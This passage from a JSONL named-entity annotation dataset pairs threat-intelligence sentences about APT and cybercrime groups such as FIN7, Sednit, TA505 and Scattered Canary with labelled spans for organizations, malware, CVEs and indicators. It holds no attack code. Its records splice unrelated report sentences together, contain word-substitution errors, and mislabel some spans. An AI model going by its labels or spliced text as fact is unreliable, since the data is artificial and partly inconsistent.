"label": "Organization"}, {"start": 5375, "end": 5380, "label": "Malware"}, {"start": 5431, "end": 5436, "label": "Organization"}, {"start": 5495, "end": 5504, "label": "Malware"}, {"start": 5509, "end": 5519, "label": "Malware"}, {"start": 5552, "end": 5557, "label": "Organization"}, {"start": 5576, "end": 5581, "label": "Organization"}, {"start": 5779, "end": 5784, "label": "Organization"}, {"start": 6003, "end": 6012, "label": "System"}, {"start": 6015, "end": 6025, "label": "Organization"}, {"start": 6026, "end": 6031, "label": "Organization"}, {"start": 6075, "end": 6086, "label": "Organization"}, {"start": 6089, "end": 6097, "label": "Organization"}, {"start": 6130, "end": 6140, "label": "Organization"}, {"start": 6208, "end": 6222, "label": "Organization"}, {"start": 6243, "end": 6248, "label": "Organization"}, {"start": 6310, "end": 6315, "label": "Organization"}, {"start": 6318, "end": 6323, "label": "Organization"}, {"start": 6330, "end": 6340, "label": "Organization"}, {"start": 6440, "end": 6455, "label": "Organization"}, {"start": 6476, "end": 6481, "label": "Organization"}, {"start": 6641, "end": 6648, "label": "Organization"}, {"start": 6752, "end": 6757, "label": "Organization"}, {"start": 6835, "end": 6852, "label": "Organization"}, {"start": 6853, "end": 6859, "label": "Organization"}, {"start": 6860, "end": 6865, "label": "Organization"}, {"start": 6886, "end": 6891, "label": "Organization"}, {"start": 7124, "end": 7128, "label": "Organization"}, {"start": 7330, "end": 7336, "label": "Organization"}, {"start": 7428, "end": 7443, "label": "Organization"}, {"start": 7569, "end": 7576, "label": "Organization"}, {"start": 7654, "end": 7660, "label": "Organization"}, {"start": 7716, "end": 7721, "label": "Organization"}, {"start": 7743, "end": 7748, "label": "Indicator"}, {"start": 7969, "end": 7984, "label": "Organization"}, {"start": 8084, "end": 8096, "label": "Organization"}, {"start": 8204, "end": 8209, "label": "Organization"}, {"start": 8302, "end": 8310, "label": "Organization"}, {"start": 8350, "end": 8355, "label": "Organization"}, {"start": 8494, "end": 8499, "label": "Organization"}, {"start": 8679, "end": 8682, "label": "Malware"}, {"start": 8820, "end": 8825, "label": "Organization"}, {"start": 9060, "end": 9070, "label": "Malware"}, {"start": 9113, "end": 9118, "label": "Organization"}, {"start": 9196, "end": 9201, "label": "Organization"}, {"start": 9219, "end": 9229, "label": "Malware"}, {"start": 9340, "end": 9347, "label": "Organization"}, {"start": 9411, "end": 9429, "label": "Organization"}, {"start": 9553, "end": 9558, "label": "Malware"}, {"start": 9739, "end": 9748, "label": "Organization"}, {"start": 9751, "end": 9757, "label": "Organization"}, {"start": 9764, "end": 9774, "label": "Organization"}, {"start": 9824, "end": 9836, "label": "Organization"}, {"start": 9902, "end": 9912, "label": "Malware"}, {"start": 9954, "end": 9959, "label": "Organization"}, {"start": 9962, "end": 9967, "label": "Organization"}, {"start": 10279, "end": 10284, "label": "Organization"}, {"start": 10322, "end": 10329, "label": "Organization"}, {"start": 10362, "end": 10371, "label": "Organization"}, {"start": 10427, "end": 10434, "label": "Vulnerability"}, {"start": 10465, "end": 10472, "label": "Organization"}, {"start": 10580, "end": 10584, "label": "Indicator"}, {"start": 10609, "end": 10617, "label": "Indicator"}, {"start": 10736, "end": 10745, "label": "Organization"}, {"start": 10853, "end": 10858, "label": "Organization"}, {"start": 10875, "end": 10895, "label": "Organization"}, {"start": 10908, "end": 10915, "label": "Organization"}, {"start": 10987, "end": 10997, "label": "Indicator"}, {"start": 11002, "end": 11011, "label": "Indicator"}, {"start": 11019, "end": 11023, "label": "Malware"}, {"start": 11127, "end": 11132, "label": "Organization"}, {"start": 11135, "end": 11145, "label": "Indicator"}, {"start": 11279, "end": 11286, "label": "Organization"}, {"start": 11362, "end": 11370, "label": "Indicator"}, {"start": 11373, "end": 11383, "label": "Indicator"}, {"start": 11390, "end": 11399, "label": "Indicator"}, {"start": 11449, "end": 11457, "label": "Organization"}, {"start": 11628, "end": 11637, "label": "Organization"}, {"start": 11659, "end": 11667, "label": "Organization"}, {"start": 11776, "end": 11781, "label": "Organization"}, {"start": 11914, "end": 11923, "label": "Malware"}, {"start": 11981, "end": 11990, "label": "Organization"}, {"start": 12026, "end": 12031, "label": "Organization"}, {"start": 12256, "end": 12276, "label": "Indicator"}, {"start": 12365, "end": 12373, "label": "Organization"}, {"start": 12419, "end": 12432, "label": "Malware"}, {"start": 12900, "end": 12913, "label": "Organization"}, {"start": 13027, "end": 13032, "label": "System"}, {"start": 13056, "end": 13062, "label": "Organization"}, {"start": 13079, "end": 13087, "label": "Organization"}, {"start": 13170, "end": 13179, "label": "Organization"}, {"start": 13213, "end": 13216, "label": "Organization"}, {"start": 13298, "end": 13302, "label": "Organization"}, {"start": 13620, "end": 13626, "label": "Organization"}, {"start": 13740, "end": 13759, "label": "Malware"}, {"start": 13845, "end": 13859, "label": "Organization"}, {"start": 13889, "end": 13902, "label": "Vulnerability"}, {"start": 13906, "end": 13915, "label": "Organization"}, {"start": 13938, "end": 13951, "label": "Vulnerability"}, {"start": 14067, "end": 14080, "label": "Organization"}, {"start": 14335, "end": 14357, "label": "Organization"}, {"start": 14361, "end": 14373, "label": "Organization"}, {"start": 14394, "end": 14416, "label": "Malware"}, {"start": 14477, "end": 14491, "label": "Organization"}, {"start": 14582, "end": 14595, "label": "Vulnerability"}, {"start": 14802, "end": 14811, "label": "System"}, {"start": 14865, "end": 14868, "label": "System"}, {"start": 14938, "end": 14952, "label": "Organization"}, {"start": 15284, "end": 15293, "label": "System"}, {"start": 15336, "end": 15345, "label": "System"}, {"start": 15557, "end": 15570, "label": "Vulnerability"}, {"start": 15623, "end": 15644, "label": "Organization"}, {"start": 15653, "end": 15668, "label": "Organization"}, {"start": 15754, "end": 15763, "label": "System"}, {"start": 15788, "end": 15794, "label": "Organization"}, {"start": 15976, "end": 15982, "label": "Organization"}, {"start": 16018, "end": 16026, "label": "Malware"}, {"start": 16061, "end": 16075, "label": "Organization"}, {"start": 16128, "end": 16134, "label": "Organization"}, {"start": 16144, "end": 16157, "label": "Vulnerability"}, {"start": 16161, "end": 16168, "label": "Vulnerability"}, {"start": 16203, "end": 16225, "label": "Malware"}, {"start": 16276, "end": 16283, "label": "Organization"}, {"start": 16316, "end": 16330, "label": "Organization"}, {"start": 16353, "end": 16362, "label": "System"}, {"start": 16374, "end": 16398, "label": "Organization"}, {"start": 16422, "end": 16428, "label": "Organization"}, {"start": 16443, "end": 16460, "label": "Malware"}, {"start": 16475, "end": 16484, "label": "System"}, {"start": 16605, "end": 16619, "label": "Organization"}, {"start": 16651, "end": 16656, "label": "Organization"}, {"start": 16692, "end": 16700, "label": "Malware"}, {"start": 16734, "end": 16748, "label": "Organization"}, {"start": 16875, "end": 16884, "label": "Indicator"}, {"start": 16928, "end": 16941, "label": "Vulnerability"}, {"start": 16944, "end": 16955, "label": "Vulnerability"}, {"start": 16969, "end": 16977, "label": "Indicator"}, {"start": 17077, "end": 17083, "label": "System"}, {"start": 17095, "end": 17103, "label": "System"}, {"start": 17106, "end": 17116, "label": "Indicator"}, {"start": 17189, "end": 17202, "label": "Indicator"}, {"start": 17274, "end": 17287, "label": "Indicator"}, {"start": 17325, "end": 17333, "label": "Indicator"}, {"start": 17380, "end": 17383, "label": "Organization"}, {"start": 17500, "end": 17503, "label": "System"}, {"start": 17541, "end": 17544, "label": "Organization"}, {"start": 17574, "end": 17588, "label": "Organization"}, {"start": 17631, "end": 17641, "label": "Malware"}, {"start": 17652, "end": 17660, "label": "Malware"}, {"start": 17705, "end": 17719, "label": "Malware"}, {"start": 17991, "end": 18003, "label": "Indicator"}, {"start": 18016, "end": 18035, "label": "Indicator"}, {"start": 18052, "end": 18116, "label": "Indicator"}, {"start": 18153, "end": 18162, "label": "Malware"}, {"start": 18182, "end": 18196, "label": "Organization"}]}
{"text": "While analyzing a campaign run by the Gamaredon group , FortiGuard Labs discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis . The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 ( EternalBlue ) that we saw uploaded to the other errr.aspx webshell . According to Microsoft\u2019s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 ( EternalBlue ) vulnerability patched in MS17-010 . Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems . We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft\u2019s Create Media application , both of which we had never seen used for DLL sideloading before . Consequently , the Linux malware ecosystem is plagued by financial driven crypto-miners and DDoS botnet tools which mostly target vulnerable servers . We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft\u2019s Create Media application , both of which we had never seen used for DLL sideloading before . It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . The group\u2019s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . In 2018-2019 , researchers of Kaspersky Lab\u2019s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . One of the domains used by FIN7 in their 2018 campaign of spear phishing contained more than 130 email APTes , leading us to think that more than 130 companies had been targeted by the end of 2018 . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . Given FIN7\u2019s previous use of false security companies , we decided to look deeper into this one . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . FIN7\u2019s last campaigns were targeting banks in Europe and Central America . After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . This threat actor stole suspected of stealing \u20ac13 million from Bank of Valetta , Malta earlier this year . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc. , and can act as a keylogger . They also use AutoIT droppers , password-protected EXE files and even ISO images . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste\u201d from a previously unknown APT . FIN7 and Cobalt used decoy 302 HTTP redirections too , FIN7 on its GRIFFON C2s before January 2018 , and Cobalt , on its staging servers , similar to CopyPaste . Quite recently , FIN7 threat actors typosquatted the brand Digicert\u201d using the domain name digicert-cdn[.]com , which is used as a command and control server for their GRIFFON implants . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . we observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims\u2019 networks . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . MuddyWater is widely regarded as a long-lived APT group in the Middle East . From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan . FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . We also unearthed and detailed our other findings on MuddyWater , such as its connection to four Android malware variants and its use of false flag techniques , among others , in our report New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors , False Flags , Android malware , and More . Instead , the campaign used compromised legitimate accounts to trick victims into installing malware . Notably , the group\u2019s use of email as infection vector seems to yield success for their campaigns . We also observed MuddyWater\u2019s use of multiple open source post-exploitation tools , which they deployed after successfully compromising a target . The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads . The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . In a case in June 2019 , we also noticed Warzone RAT being used . Xpert RAT reportedly first appeared in 2011 . The first version of Proyecto RAT\u201d was published at the end of 2010 . But with the West African gang we\u2019ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime .", "spans": [{"start": 38, "end": 47, "label": "Organization"}, {"start": 56, "end": 71, "label": "Organization"}, {"start": 164, "end": 170, "label": "Organization"}, {"start": 240, "end": 254, "label": "Organization"}, {"start": 279, "end": 292, "label": "Malware"}, {"start": 500, "end": 513, "label": "Vulnerability"}, {"start": 579, "end": 592, "label": "Malware"}, {"start": 648, "end": 661, "label": "Vulnerability"}, {"start": 664, "end": 675, "label": "Vulnerability"}, {"start": 712, "end": 721, "label": "Indicator"}, {"start": 746, "end": 757, "label": "Organization"}, {"start": 893, "end": 899, "label": "Organization"}, {"start": 987, "end": 1000, "label": "Vulnerability"}, {"start": 1003, "end": 1014, "label": "Vulnerability"}, {"start": 1042, "end": 1050, "label": "Indicator"}, {"start": 1121, "end": 1125, "label": "Organization"}, {"start": 1131, "end": 1144, "label": "Malware"}, {"start": 1155, "end": 1164, "label": "System"}, {"start": 1316, "end": 1330, "label": "Organization"}, {"start": 1559, "end": 1564, "label": "System"}, {"start": 1597, "end": 1606, "label": "Organization"}, {"start": 1670, "end": 1688, "label": "Organization"}, {"start": 1712, "end": 1718, "label": "Organization"}, {"start": 1790, "end": 1802, "label": "Malware"}, {"start": 1842, "end": 1859, "label": "Malware"}, {"start": 1903, "end": 1906, "label": "System"}, {"start": 1928, "end": 1930, "label": "Organization"}, {"start": 2050, "end": 2057, "label": "Organization"}, {"start": 2118, "end": 2132, "label": "Malware"}, {"start": 2165, "end": 2182, "label": "Malware"}, {"start": 2287, "end": 2296, "label": "Malware"}, {"start": 2312, "end": 2314, "label": "Indicator"}, {"start": 2350, "end": 2365, "label": "Organization"}, {"start": 2383, "end": 2387, "label": "Organization"}, {"start": 2517, "end": 2521, "label": "Organization"}, {"start": 2692, "end": 2707, "label": "Organization"}, {"start": 2741, "end": 2745, "label": "Organization"}, {"start": 2807, "end": 2816, "label": "Organization"}, {"start": 2817, "end": 2856, "label": "Organization"}, {"start": 2955, "end": 2959, "label": "Organization"}, {"start": 3094, "end": 3098, "label": "Organization"}, {"start": 3164, "end": 3169, "label": "System"}, {"start": 3339, "end": 3343, "label": "Organization"}, {"start": 3400, "end": 3425, "label": "Malware"}, {"start": 3538, "end": 3545, "label": "Indicator"}, {"start": 3713, "end": 3720, "label": "Indicator"}, {"start": 3836, "end": 3842, "label": "Organization"}, {"start": 3865, "end": 3883, "label": "Organization"}, {"start": 3933, "end": 3949, "label": "Organization"}, {"start": 3958, "end": 3967, "label": "Organization"}, {"start": 4046, "end": 4051, "label": "Organization"}, {"start": 4084, "end": 4100, "label": "Organization"}, {"start": 4122, "end": 4128, "label": "Organization"}, {"start": 4159, "end": 4164, "label": "Organization"}, {"start": 4230, "end": 4234, "label": "Organization"}, {"start": 4248, "end": 4257, "label": "Malware"}, {"start": 4266, "end": 4288, "label": "Malware"}, {"start": 4292, "end": 4302, "label": "Malware"}, {"start": 4401, "end": 4409, "label": "Organization"}, {"start": 4508, "end": 4512, "label": "Organization"}, {"start": 4586, "end": 4590, "label": "Organization"}, {"start": 4640, "end": 4648, "label": "Indicator"}, {"start": 4760, "end": 4765, "label": "System"}, {"start": 4825, "end": 4829, "label": "Organization"}, {"start": 4839, "end": 4854, "label": "Malware"}, {"start": 4939, "end": 4954, "label": "Organization"}, {"start": 4959, "end": 4979, "label": "Malware"}, {"start": 5002, "end": 5014, "label": "Malware"}, {"start": 5025, "end": 5034, "label": "Malware"}, {"start": 5097, "end": 5111, "label": "Vulnerability"}, {"start": 5117, "end": 5126, "label": "Malware"}, {"start": 5172, "end": 5177, "label": "Organization"}, {"start": 5187, "end": 5196, "label": "Organization"}, {"start": 5388, "end": 5392, "label": "Organization"}, {"start": 5521, "end": 5525, "label": "Organization"}, {"start": 5530, "end": 5536, "label": "Organization"}, {"start": 5552, "end": 5556, "label": "Indicator"}, {"start": 5576, "end": 5580, "label": "Organization"}, {"start": 5700, "end": 5704, "label": "Organization"}, {"start": 5742, "end": 5751, "label": "Organization"}, {"start": 5814, "end": 5821, "label": "Malware"}, {"start": 5826, "end": 5840, "label": "Malware"}, {"start": 5906, "end": 5910, "label": "Organization"}, {"start": 5944, "end": 5961, "label": "Organization"}, {"start": 5979, "end": 5988, "label": "Organization"}, {"start": 6036, "end": 6048, "label": "Organization"}, {"start": 6049, "end": 6057, "label": "Organization"}, {"start": 6058, "end": 6070, "label": "Organization"}, {"start": 6158, "end": 6167, "label": "Organization"}, {"start": 6312, "end": 6318, "label": "Organization"}, {"start": 6330, "end": 6346, "label": "Malware"}, {"start": 6360, "end": 6374, "label": "Malware"}, {"start": 6446, "end": 6455, "label": "Organization"}, {"start": 6477, "end": 6486, "label": "Organization"}, {"start": 6500, "end": 6509, "label": "Organization"}, {"start": 6615, "end": 6630, "label": "Organization"}, {"start": 6658, "end": 6665, "label": "Organization"}, {"start": 6690, "end": 6702, "label": "Malware"}, {"start": 6712, "end": 6722, "label": "Malware"}, {"start": 6785, "end": 6789, "label": "Organization"}, {"start": 6925, "end": 6935, "label": "Organization"}, {"start": 7032, "end": 7042, "label": "Organization"}, {"start": 7095, "end": 7106, "label": "Organization"}, {"start": 7109, "end": 7133, "label": "Organization"}, {"start": 7136, "end": 7145, "label": "Organization"}, {"start": 7148, "end": 7166, "label": "Organization"}, {"start": 7171, "end": 7178, "label": "Organization"}, {"start": 7257, "end": 7261, "label": "Organization"}, {"start": 7449, "end": 7459, "label": "Organization"}, {"start": 7493, "end": 7500, "label": "System"}, {"start": 7501, "end": 7508, "label": "Malware"}, {"start": 7642, "end": 7663, "label": "Malware"}, {"start": 7666, "end": 7677, "label": "Malware"}, {"start": 7680, "end": 7687, "label": "System"}, {"start": 7688, "end": 7695, "label": "Malware"}, {"start": 7737, "end": 7768, "label": "Malware"}, {"start": 7826, "end": 7833, "label": "Organization"}, {"start": 7841, "end": 7846, "label": "Malware"}, {"start": 7929, "end": 7941, "label": "Organization"}, {"start": 7970, "end": 7993, "label": "Malware"}, {"start": 8063, "end": 8071, "label": "Organization"}, {"start": 8119, "end": 8121, "label": "Indicator"}, {"start": 8193, "end": 8211, "label": "Malware"}, {"start": 8251, "end": 8262, "label": "Indicator"}, {"start": 8330, "end": 8348, "label": "Indicator"}, {"start": 8351, "end": 8362, "label": "Indicator"}, {"start": 8369, "end": 8374, "label": "Indicator"}, {"start": 8418, "end": 8429, "label": "Indicator"}, {"start": 8443, "end": 8452, "label": "Indicator"}, {"start": 8510, "end": 8523, "label": "Indicator"}, {"start": 8602, "end": 8618, "label": "Organization"}, {"start": 8659, "end": 8664, "label": "System"}]}
{"text": "In this blog , Unit 42 provides details of the tools and tactics we observed on these compromised SharePoint servers , explain how we believe these connect to the Emissary Panda threat group . This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we\u2019ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business . While this criminal organization\u2019s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 . On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer . Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other ACT . Scattered Canary\u2019s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit . By March 2016 , one of Scattered Canary\u2019s members had built enough trust with a romance victim\u2014who we\u2019ll call Jane\u2014that she became a frequent source of new mule accounts for the group . Alpha\u2019s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . By all accounts , late 2015 was the beginning of BEC for Scattered Canary . The first type of attack Scattered Canary pivoted to was credential phishing . Between July 2015 and February 2016 , Scattered Canary\u2019s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page . In the first few months of their credential phishing ventures , Scattered Canary\u2019s sights were mostly set on Asian targets\u2014Malaysia and Japan , in particular . In November 2015 , the group started to focus on North American users , mostly in the United States . This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 98, "end": 116, "label": "System"}, {"start": 163, "end": 177, "label": "Organization"}, {"start": 219, "end": 243, "label": "Organization"}, {"start": 294, "end": 310, "label": "Organization"}, {"start": 457, "end": 465, "label": "Organization"}, {"start": 488, "end": 502, "label": "Organization"}, {"start": 791, "end": 807, "label": "Organization"}, {"start": 823, "end": 828, "label": "System"}, {"start": 1001, "end": 1005, "label": "Organization"}, {"start": 1066, "end": 1084, "label": "Organization"}, {"start": 1231, "end": 1249, "label": "Organization"}, {"start": 1394, "end": 1401, "label": "Organization"}, {"start": 1628, "end": 1644, "label": "Organization"}, {"start": 1672, "end": 1688, "label": "Organization"}, {"start": 1764, "end": 1782, "label": "Organization"}, {"start": 1946, "end": 1964, "label": "Organization"}, {"start": 2219, "end": 2235, "label": "Organization"}]}
{"text": "QiAnXin identified this APT group coded as \u2018APT-C-35\u2019 in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage . In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . For over eighteen months from March 2017 until November 2018 , Scattered Canary\u2019s frequent enterprise-focused credential phishing campaigns almost exclusively targeted businesses in the United States and Canada . In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards . Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies . In total , 35 actors have been tied to Scattered Canary\u2019s operations since the group emerged in 2008 . Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own . When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.\u201d These formats are templated text documents that can contain several layers of phishing messages to send to potential victims . Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group . If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today\u2019s most pernicious email scams , this report demonstrates that a much more holistic approach\u2014one based on threat actor identity rather than type of fraudulent activity\u2014is required to detect email fraud and protect organizations . This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations . Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia . In the past , Sednit used a similar technique for credential phishing . At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components . As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs . The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . It used GitHub and Slack as tools for communication between the malware and its controller . On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website . This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro\u2019s Zero Day Initiative ( ZDI ) that was just patched this April .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 43, "end": 53, "label": "Organization"}, {"start": 88, "end": 96, "label": "Organization"}, {"start": 162, "end": 178, "label": "Organization"}, {"start": 329, "end": 347, "label": "Organization"}, {"start": 570, "end": 586, "label": "Organization"}, {"start": 735, "end": 740, "label": "System"}, {"start": 761, "end": 777, "label": "Organization"}, {"start": 942, "end": 958, "label": "Organization"}, {"start": 1009, "end": 1034, "label": "Organization"}, {"start": 1076, "end": 1094, "label": "Organization"}, {"start": 1169, "end": 1175, "label": "Organization"}, {"start": 1188, "end": 1195, "label": "Malware"}, {"start": 1200, "end": 1209, "label": "Malware"}, {"start": 1320, "end": 1336, "label": "Organization"}, {"start": 1645, "end": 1650, "label": "Malware"}, {"start": 1679, "end": 1685, "label": "Organization"}, {"start": 1697, "end": 1713, "label": "Organization"}, {"start": 1982, "end": 1987, "label": "System"}, {"start": 2067, "end": 2073, "label": "Organization"}, {"start": 2093, "end": 2112, "label": "Malware"}, {"start": 2173, "end": 2179, "label": "Organization"}, {"start": 2302, "end": 2308, "label": "Organization"}, {"start": 2430, "end": 2435, "label": "System"}, {"start": 2586, "end": 2593, "label": "Organization"}, {"start": 2621, "end": 2629, "label": "Malware"}, {"start": 2754, "end": 2758, "label": "Organization"}, {"start": 2813, "end": 2826, "label": "Vulnerability"}, {"start": 2863, "end": 2865, "label": "Organization"}, {"start": 2871, "end": 2877, "label": "Malware"}, {"start": 2882, "end": 2887, "label": "Malware"}, {"start": 2999, "end": 3003, "label": "Organization"}, {"start": 3082, "end": 3095, "label": "Vulnerability"}, {"start": 3147, "end": 3180, "label": "Organization"}, {"start": 3183, "end": 3186, "label": "Organization"}]}
{"text": "CTU researchers assess with moderate confidence that APT28 is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government . Since we published out last report on SLUB , the backdoor has been updated and several improvements were implemented . The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . During this attack , we found that the SLUB malware used two Slack teams sales-yww9809\u201d and marketing-pwx7789 . SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments . In April 2018 , SWEED began making use of a previously disclosed Office exploit . In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea . Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 53, "end": 58, "label": "Organization"}, {"start": 147, "end": 165, "label": "Organization"}, {"start": 206, "end": 210, "label": "Organization"}, {"start": 217, "end": 225, "label": "Malware"}, {"start": 291, "end": 295, "label": "Organization"}, {"start": 386, "end": 399, "label": "Vulnerability"}, {"start": 403, "end": 416, "label": "Vulnerability"}, {"start": 458, "end": 462, "label": "Organization"}, {"start": 531, "end": 536, "label": "Organization"}, {"start": 618, "end": 624, "label": "System"}, {"start": 670, "end": 675, "label": "Organization"}, {"start": 726, "end": 733, "label": "Vulnerability"}, {"start": 779, "end": 784, "label": "Organization"}, {"start": 827, "end": 836, "label": "Organization"}, {"start": 845, "end": 859, "label": "Vulnerability"}, {"start": 893, "end": 902, "label": "Organization"}, {"start": 1025, "end": 1029, "label": "Organization"}, {"start": 1252, "end": 1255, "label": "Indicator"}, {"start": 1281, "end": 1287, "label": "System"}, {"start": 1316, "end": 1330, "label": "Malware"}, {"start": 1366, "end": 1372, "label": "Indicator"}, {"start": 1385, "end": 1392, "label": "Vulnerability"}, {"start": 1397, "end": 1410, "label": "Vulnerability"}, {"start": 1454, "end": 1478, "label": "System"}]}
{"text": "It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances . TA505 is also using FlowerPippi ( Backdoor.Win32.FLOWERPIPPI.A ) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . On June 14 , we saw TA505\u2019s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . It later delivered an information stealer named EmailStealer , \u201d which stolesimple mail transfer protocol SMTP ) credentials and email addresses in the victim\u2019s machine . On June 18 , the majority of the campaign\u2019s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note\u201d or Confirmation . This campaign used the abovementioned .HTML file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . On June 17 , we observed the campaign\u2019s spam emails delivering malware-embedded Excel files directly as an attachment . On June 20 , we spotted the campaign\u2019s spam emails delivering .doc and .xls files . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . After our analysis , we 